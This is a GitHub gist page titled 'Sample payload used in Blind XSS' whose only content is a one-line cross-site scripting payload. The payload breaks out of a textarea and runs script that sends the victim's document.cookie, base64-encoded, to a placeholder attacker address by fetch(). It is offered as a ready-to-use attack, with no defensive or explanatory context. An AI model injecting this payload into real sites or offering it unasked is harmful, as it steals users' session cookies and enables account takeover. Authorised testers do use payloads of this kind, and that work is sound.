Skip to content

Instantly share code, notes, and snippets.

@ShubhamJagtap2000
Created September 5, 2022 14:02
Show Gist options
  • Save ShubhamJagtap2000/a58f8e6162f4d435e5146cccd757d0ad to your computer and use it in GitHub Desktop.
Save ShubhamJagtap2000/a58f8e6162f4d435e5146cccd757d0ad to your computer and use it in GitHub Desktop.
Sample payload used in Blind XSS
</textarea><script>fetch('http://{URL_OR_IP:Port}?cookie=' + btoa(document.cookie) );</script>
@ShubhamJagtap2000
Copy link
Author

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment